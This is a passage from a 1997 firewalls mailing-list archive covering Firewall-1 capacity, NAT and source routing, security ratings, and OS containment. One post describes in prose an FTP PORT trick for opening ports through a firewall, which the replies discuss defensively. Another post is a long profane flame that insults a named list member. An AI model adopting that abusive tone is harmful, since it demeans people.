-0800 From: drexx@sunphil.mozcom.com (Dexter D. Laggui) Message-Id: <199701070024.QAA18062@sunphil.sunphil.mozcom.com> To: firewalls@greatcircle.com, dwee@singapore.sun.com Subject: FW-1 throughput? Etc. X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello world, I would be very much obliged if anybody can please answer on this: 1] How many packets per second can the Solstice Firewall-1 2.1 (installed in a Sun Sparcstation 20 with Solaris 2.5) process ? In mbps terms? 2] Current needs dictate for a solution involving FWs with multiple secure VPNs to mobile customers. I like the capabilties of FW-1 2.1 very much but I understand that it does not support VPN today. Do I really need the SunScreen EFS to complement it? 3] Who do I talk to in Sun Singapore for FW and SunScreen training? What is the mailing list for Checkpoint/Solstice Firewall-1 users? Thank you very much for your kindness. :-) Yours, Dexter D. Laggui Systems Engineer drexx@sunphil.mozcom.com Philippine Systems Products Inc. ----- End Included Message ----- From firewalls-owner Mon Jan 6 04:14:19 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA29252 for firewalls-outgoing; Mon, 6 Jan 1997 04:00:24 -0800 (PST) Received: from sonda.cl (mail.sonda.cl [200.6.65.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id DAA29158 for ; Mon, 6 Jan 1997 03:59:59 -0800 (PST) Received: by guardia.sonda.cl id <24196>; Mon, 6 Jan 1997 09:02:45 -0300 Posted-Date: Mon, 6 Jan 1997 08:57:14 -0300 Date: Mon, 6 Jan 1997 02:47:07 -0300 Message-Id: <97Jan6.090245cdt.24196@guardia.sonda.cl> From: m_fliguer@sonda.cl (Miguel Fliguer - Troppus Erawtfos) To: firewalls@GreatCircle.COM Subject: Re: Air Force Web Site Hacked X-VMS-To: SMTP%"firewalls@GreatCircle.com" X-VMS-Cc: M_FLIGUER Sender: firewalls-owner@GreatCircle.COM Precedence: bulk uskanbye@ibmmail.com wrote : >>> [snip snip snip] >>> Physical read-only storage may offer SOME protection, but still >>> not hackproof (not to mention the probable performance penalty >>> you'd pay for optical. Let's go one step further and make the website ROM-based ;-) Even better, let's put the pages on some sort of non-volatile RAM with a "Write Enable" jumper. Then, when a page change is needed, we'll only need to open the case, put the jumper on, make the changes, remove the jumper, close the case... All performance problems inherent to CD-ROM speed are gone !!! :-) Sorry, it was stronger than myself.... Regards, Miguel m_fliguer@scomp1.sonda.cl From firewalls-owner Mon Jan 6 04:59:09 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA01273 for firewalls-outgoing; Mon, 6 Jan 1997 04:52:44 -0800 (PST) Received: from linda.if.is (linda.if.is [193.4.185.193]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id EAA01244 for ; Mon, 6 Jan 1997 04:52:23 -0800 (PST) Received: from ilmur.if.is by linda.if.is (Secure/IFnet/18-11-96); Mon, 6 Jan 1997 12:24:58 GMT Received: by ilmur.if.is (Secure/IFnet/09-12-96); Mon, 6 Jan 1997 12:57:20 GMT From: gunni@if.is (Gunnar Ingvi Thorisson) Message-Id: <199701061257.MAA32657@ilmur.if.is> Subject: Re: Air Force Web Site Hacked To: m_fliguer@sonda.cl (Miguel Fliguer - Troppus Erawtfos) Date: Mon, 6 Jan 1997 12:57:18 +0000 (GMT) Cc: firewalls@GreatCircle.COM In-Reply-To: <97Jan6.090245cdt.24196@guardia.sonda.cl> from "Miguel Fliguer - Troppus Erawtfos" at Jan 6, 97 02:47:07 am X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > >>> [snip snip snip] > >>> Physical read-only storage may offer SOME protection, but still > >>> not hackproof (not to mention the probable performance penalty > >>> you'd pay for optical. > > Let's go one step further and make the website ROM-based ;-) Even > better, let's put the pages on some sort of non-volatile RAM with > a "Write Enable" jumper. Then, when a page change is needed, we'll > only need to open the case, put the jumper on, make the changes, > remove the jumper, close the case... All performance problems > inherent to CD-ROM speed are gone !!! :-) > > Sorry, it was stronger than myself.... > > Regards, > Miguel > m_fliguer@scomp1.sonda.cl I think this thread is getting OFF-TOPIC, please stop talking about this Air-Force web page hacking. Once the hacker enters the site he changes the Document root to NFS mounted directory from the other side of the world! Thank you, Gunnar Ingvi Thorisson Iceland Software Inc. - gunni@if.is Coda (Financials) Iceland - gunni@coda.is From firewalls-owner Mon Jan 6 05:59:09 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA03627 for firewalls-outgoing; Mon, 6 Jan 1997 05:47:42 -0800 (PST) Received: from aragorn.kingston.net (aragorn.kingston.net [205.189.48.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id FAA03608 for ; Mon, 6 Jan 1997 05:47:31 -0800 (PST) Received: (from uucp@localhost) by aragorn.kingston.net (8.6.12/8.6.12) with UUCP id JAA26252 for firewalls@GreatCircle.COM; Mon, 6 Jan 1997 09:01:02 -0500 Received: from ent106-ppp by empire.ca (SMI-8.6/SMI-SVR4) id TAA12111; Sat, 4 Jan 1997 19:34:42 -0500 Date: Sat, 4 Jan 1997 19:34:42 -0500 From: citpaj@aragorn.kingston.net (Paul Jenkins) Message-Id: <199701050034.TAA12111@empire.ca> To: firewalls@GreatCircle.COM Subject: Mailing List Cc: firewalls@GreatCircle.COM X-Mailer: Pronto E-Mail [version 2.01] MIME-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk As the Postmaster at empire.ca, I've noticed a lot of Firewall related mail from your site, addressed to Keith Grant, who used to work at our Company. As Keith is no longer with the Company, can you please remove him from your mailing list, so as we cease to be inundated with this mail about firewalls. It's a pain for me to have to watch it build, and then delete it occassionally, let alone the waste of disk space at our ISP and here at our site. Look forward to receiving your co-operation on this one. Thanks, Paul Jenkins From firewalls-owner Mon Jan 6 08:54:50 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA10345 for firewalls-outgoing; Mon, 6 Jan 1997 08:15:33 -0800 (PST) Received: from monet.mingpaoxpress.com (babbage.mingpaoxpress.com [205.150.120.3]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id IAA10312 for ; Mon, 6 Jan 1997 08:15:07 -0800 (PST) Received: by www.mingpaoxpress.com id <1929-10805>; Mon, 6 Jan 1997 11:14:33 -0500 Received: by www.mingpaoxpress.com id <1928-10808>; Mon, 6 Jan 1997 11:14:18 -0500 Path: acli Subject: Re: Re[2]: NT NAT Distribution: local Organization: Ming Pao Daily News (Canada) Message-ID: References: <9701050100.AA02172@sonic.nmti.com.nmti.com> Date: Mon, 6 Jan 1997 16:14:08 GMT From: Ambrose Li To: firewalls@greatcircle.com Reply-To: Ambrose Li Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In article <9701050100.AA02172@sonic.nmti.com.nmti.com>, Peter da Silva wrote: >> If I am using for example Linux, would it be enough to >> configure the linux kernel to drop source routed packets? > >I don't know. It's a sysctl option in FreeBSD. In Linux you have to recompile your kernel to turn on/off source routing. -- Ambrose Li. acli@mingpaoxpress.com. Ming Pao Newspapers (Canada) Ltd., EDP department. 1355 Huntingwood Drive, Scarborough, Ontario, M1S 3J1, Canada. Voice +1 416 321 0088 x272 Fax +1 416 321 9663. My favourite OS has yet no From firewalls-owner Mon Jan 6 08:58:34 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA10916 for firewalls-outgoing; Mon, 6 Jan 1997 08:35:38 -0800 (PST) Received: from arden.iss.net (arden.iss.net [204.241.60.8]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id IAA10878 for ; Mon, 6 Jan 1997 08:34:48 -0800 (PST) Received: (from mhw@localhost) by arden.iss.net (8.8.4/8.7.3) id MAA06710; Mon, 6 Jan 1997 12:33:46 -0500 From: Michael Warfield Message-Id: <199701061733.MAA06710@arden.iss.net> Subject: Re: Christopher Klaus and ISS To: lists@reflections.mindspring.com (Todd Graham Lewis) Date: Mon, 6 Jan 1997 12:33:46 -0500 (EST) Cc: firewalls@greatcircle.com In-Reply-To: from "Todd Graham Lewis" at Dec 31, 96 09:04:36 pm X-Mailer: ELM [version 2.4 PL25] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk My appolgies in advance to Brent and the other denizens on this list for raising the noise level on this subject but I feel, as a personal afront, this should not stand unchallenged... In this matter, I am speaking solely for myself and my personal opinion and NOT for Internet Security Systems, Inc. I took this last week to research issues brought up in these two messages. I asked other engineers as Internet Security Systems not to reply to these messages until I had completed my research and had replied myself. On Tue, 31 Dec 1996 Todd Graham Lewis enscribed thusly: > On Mon, 23 Dec 1996, Feeney, Tim wrote: > > Well since Mr. Klaus refuses to play by the rules I would like to see > > all mail from iss.net bounced back to them. I realize that some people > > want to see what they have to offer but there are plenty of "HELP" posts > > to this list that Mr. Klaus can put his (and his company's) two cents > > in. He instead insists on posting non-solicited marketing dribble to a > > list that already has quite a volume. Any comments or seconds? I reviewed the archives for the firewalls mailing list for all of 1996 looking for postings by Chris. In that last year there have been a grand total of 18 messages. Five of these were "Re:'s" replying to someone else's questions or information. Several of them were providing security related information or commentary on such subjects as the InfoWorld firewalls comparison and Dan Farmers security survey. One was a announcement that ISS would make an alpha version of some of our development software available free to combat the raging SYN flood problem that was occuring at that time. Several ISP's used that software to successfully abate crippling SYN flood attacks. Two messages, in December, were product announcements. Chris has played by the rules. He posted a grand total of two "Announcements" clearly labeled as such and both on products very relevant to security and firewalls. One is even a product being actively used to test firewalls. Commercial, yes, but no more commercial than hundreds (yes I said hundreds and I mean hundreds) of other commercial messages that have appeared on this list. His one "sin" was that one of the messages was excessive and he should have posted a URL in a short message rather than the longer announcement. When I mentioned that matter to him he agreed that he had made a mistake on that and that he was wrong there. His mistakes are ones of enthusiasm more than anything else. He is rightfully proud of what we have created and continue to create. He has actually behaved much better than some of the other slime who have attempted to use underhanded, thinly veiled excuses, to get their commercial messages across. Let's NOT forget "Dr Fredrick Cohen, PhD" and his piles and piles of messages, some relevant, some not, some trivial to the point of ridiculous, and some even destructive (remember his suggestion to "cut the wire to the record head on the floppy drive to make it read only" :-) ), that were used as a vehicle to plaster us with his advertisement signatures. That continued unabated for months until Brent was finally forced to pull the plug on Ol' Freddy... His nonsense got so bad it prompted some of the members of this list to include signatures which read "So you've got a PhD, just don't touch anything". That was well over a year ago (probably before your time Todd, so you're excused) and I STILL see that sig line showing up all over the place. We are talking about two, TWO, (yes Todd even you can count to two) announcements, both of which were topic relavent, for new products which could well have been of interest to the participants on this list. And unlike many other messages posted to this list, they were clearly and appropriately labeled as "Announcements". > I've never found Klaus to be helpful at anything other than selling his > product and treating his employees like crap. The second point is > really unrelated to the motion, but mentioning it makes me feel better > about seconding that Klaus be banished. I read this message last Tuesday and went on an immediate hunt to figure out just what you were talking about. Every employee I talked to at ISS wants me to ask you some burning questions... WHAT DRUGS ARE YOU ON AND WHERE CAN WE BUY SOME?!?!? Since you are obviously not high on reality, we've all come to the conclusion that you must be participating seriously in some better living through modern chemistry! I even checked with some of our ex-employees. I've had three whole engineers out of our entire staff leave for other, bigger, positions. Nobody seems to know what the F*CK you are talking about. What's more, most of us have never heard of you. A few of us, myself included, did hear you speak in front of the Atlanta Linux Enthusiasts meeting a while ago. My opinion of you at this point is that you have hit a new all time low and you've started to dig! Since all of the messages Chris has posted have been on security and firewalls related topics and the vast majority have been non-commercial, I've come to the conclusion that your first point is either a bald-face lie or sheer blatant ignorance (or, I suspect, BOTH). Where you came up with that "second" point is totally and absolutely beyond any of us! Seeing as the vast majority of ISS employees don't even know who the F*CK you are (and those of us who do now wish we didn't), this claim is total and complete bullshit! You have absolutely no knowlege of the working conditions at ISS (which in my 30 years of participation in Corporate America are by far some of the best). Perhaps there IS another motive here though. Several times in the past, Mindspring has been soliciting for engineers at the Atlanta Unix Users Group. Being one of the resident "gurus" there for over eight years, I have also been looking for engineers to add to my staff at those meetings. Some of you even asked me, one night, why I hadn't signed on over at Mindspring. Perhaps this has more to do with your recruitment attempts than anything to do with this list. Make it sound like ISS is not such a good place to work for and maybe you would have a better shot at recruiting around AUUG? > __ > Todd Graham Lewis Linux! Core Engineering > Mindspring Enterprises tlewis@mindspring.com (800) 719 4664, x2804 On Wed, 1 Jan 1997 Todd Graham Lewis enscribed thusly: > On Tue, 31 Dec 1996, Robert Hanson wrote: > > no disrespect intended to you Todd, yet.... Naw - go ahead. Intend the disrespect he deserves... He's earned it! > > kill! maime! shoot! my goodness... we are all capitalist pigs... what > > makes anyone better than anyone else standing next to them... > I not only like corporations, I work for one. Believe it or not, I don't > even have a problem with vendors discussing their products on the list. > Those who offer help to newbies, contribute to technical discussions, > etc., are more than entitled to mention once in a while "BTW (disclaimer: > I work for 'em), our product X is designed to address this problem", or > even to say "In light of the discussion last month, I thought that the > list might be interested in our new product, SuperBlammo4000." > What I don't appreciate are bone-headed sales pitches coming from people > who never participate in the discussions on the list, and whose sole > purpose is to use the list as a free advertising channel. Chris Klaus is not a sales person. Quite the contrary, he's an engineer, who wrote and released the "shareware" version of ISS long before Dan Farmer announced SATAN. That version is still available from CERT. He does have the common sense NOT to post just for the sake of posting. He posts when he has something to contribute to the list, either to an existing discussion or providing new information. This list would be a terribly empty (but noisy) place if anyone with commercial information were forbidden to mention it in mixed company. Chris Klaus has made serious contributions to the state of the art in network security. This is far more than anyone can say about you. > I don't think that this is too far off the mark, and the fact that Klaus > is a complete asshole just makes the decision that much easier. Off the mark? You aren't even on the same plain of reality. Chris Klaus doesn't know you and you don't know him. I do know both of you and as far as assholes go, I would rather work FOR Chris Klaus than WITH an asshole like you! You really need to see a doctor about that case of optical rectitus. It's begining to look like it's on steroids now. It's no wonder that, having had your head up your ass so deep and for so long, that you now have such a shitty outlook on life. > (BTW, I'm sorry I wasn't able to participate in the discussion about Linux > firewalls. I was visiting family during the holidays.) > __ > Todd Graham Lewis Linux! Core Engineering > Mindspring Enterprises tlewis@mindspring.com (800) 719 4664, x2804 Regards, Mike -- Michael H. Warfield | Voice: (770)395-0150x123 (770)552-4823 Senior Engineer | Fax: (770)395-1972 Internet Security Systems, Inc. | E-Mail: mhw@iss.net mhw@wittsend.com 41 Perimeter Center East, Suite 660 | http://www.iss.net/ Atlanta, GA 30328 | http://www.wittsend.com/mhw/ PGP Key: 0xDF1DD471 http://www.wittsend.com/mhw/pubkey.txt From firewalls-owner Mon Jan 6 09:50:37 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA13703 for firewalls-outgoing; Mon, 6 Jan 1997 09:39:26 -0800 (PST) Received: from pcslink.com (pcslink.com [206.43.160.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id JAA13695 for ; Mon, 6 Jan 1997 09:39:13 -0800 (PST) Received: (from ryan@localhost) by pcslink.com (8.8.3/8.6.12) id KAA16417; Mon, 6 Jan 1997 10:38:28 -0700 (MST) From: Ryan Mooney Message-Id: <199701061738.KAA16417@pcslink.com> Subject: Re: Re[2]: NT NAT To: peter@baileynm.com (Peter da Silva) Date: Mon, 6 Jan 1997 10:38:27 -0700 (MST) Cc: ckn@findata.se, firewalls@GreatCircle.COM In-Reply-To: <9701041543.AA00908@sonic.nmti.com.nmti.com> from "Peter da Silva" at Jan 4, 97 09:43:54 am X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > > Please correct me if I'm wrong here but I was under the impression that > > the 192.168.x.x-addresses was 'non-routable' or whatever the term is. > > Under what circumstances can an external intruder gain access to my > > internal 192.168.x.x-machines? > > Source routed packets. > Which can and should be turned off in the router/and/or/IP Masq box. which should also do such obvious things as filter out packets to the inside addresses claiming to be from the inside... etc... this is basic stuff that you should do with EVERY firewalled enviroment IMHO. NAT with some decent filters is IMNSHO just above straight filters and straight through proxies in the security sense. Really the next level is to have a proxy that understands the protocol and can interperet the data stream for "bad things" (ie: the fwtk patches to gw-http that can filter based on tags and disallow active X, Java, etc..). If you think a stand alone straight through proxy is more secure than a good filter set on a newer routre OS, you've been drinking the vendor cool-aid. Again a proxy that understands the application data stream can be more secure. This goes back to some earlier statements that other people have alluded to, and that is the case of "Good Enough Security". If you have a billion dollars you are trying to protect, you'd better nail things down pretty damn tight. On the other hand if you are trying to protect a 1K/mo charity you'd scale things back a bit. You can't just say "This is THE solution", you have to look at the situation, analyze it, and THEN you can say "this is good enough security, here". Appropriate solutions for appropriate problems. I think to many people here get caught up in finding the 100% secure solution, this may or may not be practical in all enviroments (both from an economic and usability standpoint). That said, NAT can be an important part of an overall security scheme and may/should be coupled with other security measures including router filters, and perhaps some appropriate proxies. It is not THE solution, nothing is THE solution, they are all pieces and parts that need to be use appropriately. ---------------------------------------------------------------------------- Ryan Mooney Phone (602)265-9188 PCSLink ryan@pcslink.com Fax (602)265-9357 Internet Services The world needs more bitter, twisted souls. It would be a much better place. ----------------------------------------------------------------------------- From firewalls-owner Mon Jan 6 11:11:33 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA18124 for firewalls-outgoing; Mon, 6 Jan 1997 10:44:55 -0800 (PST) Received: from computer.mindspring.com (computer.mindspring.com [204.180.142.145]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id KAA18086 for ; Mon, 6 Jan 1997 10:44:35 -0800 (PST) Received: (from ahobson@localhost) by computer.mindspring.com (8.8.4/8.8.4) id NAA00630; Mon, 6 Jan 1997 13:43:35 -0500 (EST) From: Andrew Hobson To: Michael Warfield Cc: firewalls@greatcircle.com Subject: Re: Christopher Klaus and ISS References: <199701061733.MAA06710@arden.iss.net> Mime-Version: 1.0 (generated by tm-edit 7.96) Content-Type: text/plain; charset=US-ASCII Date: 06 Jan 1997 13:43:35 -0500 In-Reply-To: Michael Warfield's message of Mon, 6 Jan 1997 12:46:28 EST Message-ID: Lines: 25 X-Mailer: Red Gnus v0.73/XEmacs 19.15 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'd like only one small clarification. I make no comment on the flame fest. On Mon, 6 Jan 1997 12:46:28 EST, Michael Warfield said: > Perhaps there IS another motive here though. Several times in the > past, Mindspring has been soliciting for engineers at the Atlanta Unix Users > Group. Being one of the resident "gurus" there for over eight years, I have > also been looking for engineers to add to my staff at those meetings. Some > of you even asked me, one night, why I hadn't signed on over at Mindspring. > Perhaps this has more to do with your recruitment attempts than anything to > do with this list. Make it sound like ISS is not such a good place to work > for and maybe you would have a better shot at recruiting around AUUG? I make no comment about Todd's post. He was, most certainly, speaking for himself and *not* MindSpring. If Todd was bad mouthing ISS in order to recruit for MindSpring, then that's unacceptable. I'll ask Todd to refrain from speaking about ISS. Drew -- "Joe, release me from your Kung-Fu grip." -- Stacy Lavelle From firewalls-owner Mon Jan 6 11:29:09 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA20474 for firewalls-outgoing; Mon, 6 Jan 1997 11:20:42 -0800 (PST) Received: from mail2.visi.net (geneva.visi.net [204.71.248.4]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id LAA20467 for ; Mon, 6 Jan 1997 11:20:29 -0800 (PST) Received: from LOCALNAME (ppp-1-39.nn.visi.net [206.246.196.39]) by mail2.visi.net (8.8.4/12000) with SMTP id OAA12182; Mon, 6 Jan 1997 14:16:59 -0500 (EST) Date: Mon, 6 Jan 1997 14:16:59 -0500 (EST) Message-Id: <199701061916.OAA12182@mail2.visi.net> X-Sender: rodrcc@mail.visi.net X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: "Richard F. Trezza" From: Information Systems Security Officer Subject: Re: Firewall Security Ratings Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 01:01 PM 12/27/96 -0500, you wrote: >Greetings, > >Does anyone know of a URL or other Internet resource where I can verify >firewall vendor claims regarding U.S. Government computer security >ratings. Specifically, the so-called B1 and B2 classifications issued by >the National Computer Security Center? > >Happy New Year and thanks in advance. > > Richard The address that you seek is www.radium.ncsc.mil/tpep/. This is the listing for and about the Trusted Product Evaluation Program. From firewalls-owner Mon Jan 6 12:40:22 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA23990 for firewalls-outgoing; Mon, 6 Jan 1997 12:28:26 -0800 (PST) Received: from news.ptes.com (NEWSHOST.PTES.COM [138.112.199.10]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id MAA23973 for ; Mon, 6 Jan 1997 12:28:15 -0800 (PST) Received: from [138.112.190.103] (mike.ptes.com [138.112.190.103]) by news.ptes.com (8.8.4/8.8.4) with SMTP id MAA05228; Mon, 6 Jan 1997 12:26:26 -0800 (PST) X-Sender: mike@pescadero.ptes.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Mon, 6 Jan 1997 12:29:00 -0900 To: Todd Graham Lewis , Ken Hardy From: mike@ptes.com (Mike Bernhardt) Subject: Re: Untrusted vs. trusted network security Cc: Firewalls Mailing List Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >On Fri, 20 Dec 1996, Ken Hardy wrote: > >> The problem is ... >> >> The applet opens a connection back to its home system on port 21, the >> FTP port. The firewall allows outgoing FTP, so that's fine. The >> applet then issues a PORT command on the FTP channel to tell the remote >> FTP server to make a connection to a data socket that it's opened on >> some other port, as per the FTP protocol spec. The firewall, which >> normally prevents all inbound connections, sees the PORT command and >> opens that port to the applet's machine for the incoming FTP transfer. >> >> But the firewall is unable to know that the commands are coming from an >> applet and not a "real" FTP client, and the applet used port 23 >> (telnet) or 25 (smtp) or 139 (netbios) in the PORT command. So now the >> blackhat's system has an open channel to the chosen port on the machine >> running the applet. Firewall? What firewall? > >Port command? What port command? > >Virtually all modern ftp clients support the passive option. I force my >users to use it for just this reason, and I haven't heard too many >complaints. > >Proxying return FTP connections is going too far in the direction of >appeasing the user. > Isn't this the benefit of using more than one means of protection? A simple packet filter close this hole, by simply not allowing any inbound traffic to port 23. For example, our packet filtering allows NO inbound traffic to ports <1024, except for certain services to certain hosts. So no matter what the firewall thinks is OK, the packet filter won't let it through. I would think the problem described above is due more to misconfiguration than to a real "hole." If I'm wrong, please correct me, someone. ------------------------------------------------------------- "He who dies with the most toys, still dies." From firewalls-owner Mon Jan 6 13:42:46 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id NAA26777 for firewalls-outgoing; Mon, 6 Jan 1997 13:08:44 -0800 (PST) Received: from dg-rtp.dg.com (dg-rtp.rtp.dg.com [128.222.1.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id NAA26532 for ; Mon, 6 Jan 1997 13:02:16 -0800 (PST) Received: from splinter.rtp.dg.com by dg-rtp.dg.com (5.4R3.10/dg-rtp-v02) id AA23842; Mon, 6 Jan 1997 16:00:58 -0500 Received: by splinter.rtp.dg.com (8.6.10/200.15.1.2) id QAA10279; Mon, 6 Jan 1997 16:00:38 -0500 From: spencerj@dg-rtp.dg.com (Jon Spencer) Message-Id: <199701062100.QAA10279@splinter.rtp.dg.com> Subject: Re: NCSA != NCSC To: ckaplan@nohackers.com Date: Mon, 6 Jan 1997 16:00:33 -0500 (EST) Cc: firewalls@greatcircle.com In-Reply-To: <19961230094439.02e47f85.in@cbk.nohackers.com> from "ckaplan@nohackers.com" at Dec 30, 96 04:44:39 am X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > I have to say up front that I agree with MJR. > > Hardening and creativity in your OS are great for a firewall, however a NCSC > just isn't directly enough applicable. > > >Can you explain how the "hardened" OS helps? If the firewall > >software is implemented below the OS layer (e.g.: some kind > >of adaptive filtering or whatever) then the OS will never even "see" > >the traffic at all and whether it's an evaluated OS or not is > >completely irrelevant. If the firewall software is purely application > > I don't even think that this is totally valid argument in MOST implementations. > > True that in a MLSI firewall this conceptually is true, however people love > to add 'stuff' to there firewalls. Stuff like mail handlers, DNS servers, > HTTPDs, etc.. As soon as they do that this stuff becomes the week link in > there system. > While I would imagine that some exist I don't think I have seen any yet > configured as solo systems. > > The villain exploits one of the above and is then on the box. At that point > a trusted OS is unlikely to help. Those processes all too often are run as > root (Yes I know that they shouldn't, don't need to, could fork, etc...but I > am talking what far to many people end up running) and leave the villain > free to go on in. Well, true and not true. (To be redundant, anything below B2/E4 is not trustworthy.) Just because an OS is high assurance (B2/E4 and above), this doesn't mean that it protects against all things. At best, it only does what it claims to do and no more. To solve this stated problem, the claim must be that you can run untrusted software in a specific "area" such that if the untrusted software is penetrated, the damage is limited to the maximum authority available in the "area" the software was running in. This concept is included in B2 DG/UX and is called "containment." The claim is that when a user enters the system, a maximum "containment area" is assigned to him which can never be extended. When a user is connected to a service such as a web server, that web server is running in the user's containment area when it services the user. (In brief, the concept of containment is that the system is divided into two parts, that which exists for the user and that which simply does not exist for the user, so there is no way to get to it. Containment is further divided into "sub-containment" areas which define the access rights the user has - read only, write only, read write, etc. This applies to both objects AND to operations. Operations are things like halting the system, stopping auditing, changing a user profile, etc. There are an arbitrary number of containment areas on a system, and they do not have to be predefined - you roll them as you go.) Thus, if the application breaks, and the user escapes to some user interface (shell, CLI, etc.), the user has no more authority than he had in the application, and he has no way to gain any more, regardless of what passwords he knows or what smart cards he possesses or whatever. Even operating system applications (init, login, etc.) cannot break containment - that is the only way that containment could possibly work. So a high assurance containment OS CAN provide what is being asked for. And when you run web servers and Java interpreters on the high assurance containment OS, it doesn't matter whether it is Unix (as is DG/UX) or NT or ABC. Go look at DG next time you are at a trade show. BTW, I am the security architect for DG and architected this OS, so this information is correct. Of course, every father's child is beautiful and intelligent! :-) > > How about an OS that fingerprinted all its apps, or added extra file > attributes (not generatable during run-time operation) that were necessary > for execution. Then if the kernel didn't see this stuff it shuts down. > This way you could delete from the PRODUCTION system all likely tools > (chown, chmod, telnet, rxx, mknod, ifconfig, route, etc) and if the villain > tried to add his/her own the box would croak. I would take that type of > hardening over B1 any day. (Yes you need a non production IE no network > code kernel for maintenance mode.) > > > -Charles Kaplan > > -- Jon F. Spencer spencerj@rtp.dg.com (uunet!rtp.dg.com!spencerj) Data General Corp. Phone : (919)248-6246 62 T.W. Alexander Dr, MS #119 FAX : (919)248-6108 Research Triangle Park, NC 27709 Office RTP 121/9 Reality is an illusion - perception is what counts. No success can compensate for failure in the home. President David O. McKay ***** UCC 1-207 ******** From firewalls-owner Mon Jan 6 14:44:06 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA00297 for firewalls-outgoing; Mon, 6 Jan 1997 14:20:08 -0800 (PST) Received: from omsk.quadrix.com ([208.210.34.65]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id OAA00288 for ; Mon, 6 Jan 1997 14:19:54 -0800 (PST) Received: by omsk.quadrix.com (4.1/SMI-4.1) id AA04330; Mon, 6 Jan 97 17:17:32 EST Date: Mon, 6 Jan 97 17:17:32 EST From: bve@omsk.quadrix.com (BVE) Message-Id: <9701062217.AA04330@omsk.quadrix.com> To: marcg@arraycomm.com Cc: firewalls@greatcircle.com Subject: RE: packet filtering on PPP interfaces Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I figured that someone would've answered this one by now, but I haven't seen a message on the list.... Is anyone aware of ppp implementation that include packet filtering? Or of (nit-based?) packet filtering implementations that could be applied to a ppp interface under Solaris 1 (Solaris 1.2 to be exact)? I once set up Morningstar PPP (on SunOs 4.1.3u1) to protect a small Unix box from the Internet. It was a while ago, so I don't remember all the details, but it provided what (at the time) seemed like a fairly good set of features, for that type of software. It was pretty simple to configure.... I don't know if it's good enough for your needs, but it's a place to start.... -- Bill Van Emburg Phone: 908-235-2335 Quadrix Solutions, Inc. Fax: 908-235-2336 (bve@quadrix.com) Check out http://yourtown.com! (http://quadrix.com) "You do what you want, and if you didn't, you don't" From firewalls-owner Mon Jan 6 15:04:15 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA01607 for firewalls-outgoing; Mon, 6 Jan 1997 14:54:32 -0800 (PST) Received: from pdx1.world.net (pdx1.world.net [192.243.32.18]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id OAA01597 for ; Mon, 6 Jan 1997 14:54:21 -0800 (PST) From: proff@suburbia.net Received: from suburbia.net (suburbia.net [203.4.184.1]) by pdx1.world.net (8.7.5/8.7.3) with SMTP id OAA19063 for ; Mon, 6 Jan 1997 14:54:31 -0800 (PST) Received: (qmail 23172 invoked by uid 110); 6 Jan 1997 22:53:03 -0000 Message-ID: <19970106225303.23171.qmail@suburbia.net> Subject: Re: NCSA != NCSC In-Reply-To: <199701062100.QAA10279@splinter.rtp.dg.com> from Jon Spencer at "Jan 6, 97 04:00:33 pm" To: spencerj@dg-rtp.dg.com (Jon Spencer) Date: Tue, 7 Jan 1997 09:53:03 +1100 (EST) Cc: ckaplan@nohackers.com, firewalls@greatcircle.com X-Mailer: ELM [version 2.4ME+ PL28 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > How about an OS that fingerprinted all its apps, or added extra file > > attributes (not generatable during run-time operation) 